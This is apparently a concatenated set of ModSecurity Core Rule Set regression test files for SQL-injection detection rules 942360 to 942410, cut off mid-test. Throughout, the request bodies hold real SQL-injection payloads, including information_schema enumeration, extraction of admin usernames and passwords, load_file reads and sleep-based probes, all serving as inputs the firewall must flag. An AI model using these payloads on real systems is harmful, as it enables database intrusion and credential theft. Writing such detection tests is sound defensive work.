127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "select load_file(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-10 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS Role FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-11 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "` AS `edit_user_id` from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-12 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS val FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-13 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=%60+REGEXP%20" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-14 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS 'Durchschnitt_Importzeit' FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-15 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "` AS `OXTIMESTAMP` from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-16 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as col_0_0_ from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-17 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS `count` FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-18 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS schlagwoerter FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-19 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as User from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-20 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS t FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-21 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "(load_file(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-22 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as ExecuteTheseSQLCommands FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-23 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") AS schlagwoerter FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-24 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "` AS `documentType` FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-25 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "! As' from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-26 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "; As not from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-27 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT load_file(" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "6 As\" from" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: ") as day1 FROM" version: HTTP/1.0 output: log_contains: id "942360" - test_title: 942360-30 desc: GH issue 1580 stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests method: POST port: 80 uri: / data: ", aside from" version: HTTP/1.0 output: no_log_contains: id "942360" - test_title: 942360-31 desc: GH issue 1605 stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests method: POST port: 80 uri: / data: "a=/create" version: HTTP/1.0 output: no_log_contains: id "942360" - test_title: 942360-32 desc: GH issue 1605 stages: - stage: input: dest_addr: 127.0.0.1 headers: Accept: "*/*" Host: localhost User-Agent: ModSecurity CRS 3 Tests method: POST port: 80 uri: / data: "a=/CREATE TABLE Persons" version: HTTP/1.0 output: log_contains: id "942360" ������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml��������0000664�0000000�0000000�00000005613�14461225151�0027724�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942361.yaml tests: - test_title: 942361-1 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "'alter a" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-2 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\" ALTER A" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-3 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "'ALTER A" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-4 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "' alter/" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-5 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\" UNION A" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-6 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "'UNION A" version: HTTP/1.0 output: log_contains: id "942361" - test_title: 942361-7 desc: "Detects basic SQL injection based on keyword alter or union" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "' union/" version: HTTP/1.0 output: log_contains: id "942361" ���������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml��������0000664�0000000�0000000�00000000732�14461225151�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942370.yaml tests: - test_title: 942370-1 desc: "classic SQL injection probings 2/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=\"` * 12344" version: HTTP/1.0 output: log_contains: id "942370" ��������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml��������0000664�0000000�0000000�00000045272�14461225151�0027732�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942380.yaml tests: - test_title: 942380-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from `db_miwf`.`sys_refindex` limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-3 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from `information_schema`.tables limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-4 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "ORder by" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-5 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "ordeR by" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-6 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-7 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-8 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-9 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-10 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-11 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-12 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-13 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-14 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SELECT 'qzxjq'||(SELECT (CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-15 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute php" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-16 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-17 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Execute(" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-18 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-19 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-20 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-21 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-22 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "HAVING+1%3D" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-23 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute+elysi" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-24 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-25 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-26 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-27 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-28 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-29 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-30 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-31 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute node_" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-32 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute scald" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-33 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute system" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-34 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute user_" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-35 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute views" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-36 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute patha" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-37 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute workb" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-38 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "execute panel" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-39 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=from+information_schema.tables+where+1%3D2+limit" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-40 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-41 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-42 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-43 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" version: HTTP/1.0 output: log_contains: id "942380" - test_title: 942380-44 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" version: HTTP/1.0 output: log_contains: id "942380" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml��������0000664�0000000�0000000�00000000731�14461225151�0027722�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942390.yaml tests: - test_title: 942390-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=sdfsd%27or%201%20%3e%201" version: HTTP/1.0 output: log_contains: id "942390" ���������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml��������0000664�0000000�0000000�00000001016�14461225151�0027707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942400.yaml tests: - test_title: 942400-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 # variable name boundary attacks data: "and '5'orig_var_datavarname=whatever" version: HTTP/1.0 output: log_contains: id "942400" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml��������0000664�0000000�0000000�00000125771�14461225151�0027727�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942410.yaml tests: - test_title: 942410-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "ABS(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "benchmark(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-3 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "BENChmARk(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-4 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "cast(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-5 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "CAST(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-6 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "char(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-7 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "chaR(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-8 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "chr(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-9 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "CHR(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-10 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "COALESCE(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-11 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Compress (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-12 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "concat (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-13 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "cOnCaT(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-14 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "concat_ws(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-15 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "convert(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-16 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "cOnVeRt(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-17 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "COS(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-18 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "COUNT(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-19 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "CURRENT_USER(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-20 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "database (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-21 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "date(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-22 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=date%5D%3D%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-23 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=day.+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-24 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=day%26%27%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-25 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=decode%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-26 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=default%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-27 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=ELT%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-28 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=encode%3D%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-29 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=ExtractValue%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-30 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=EXTRACTVALUE%28" version: HTTP/1.0 output: log_contains: id 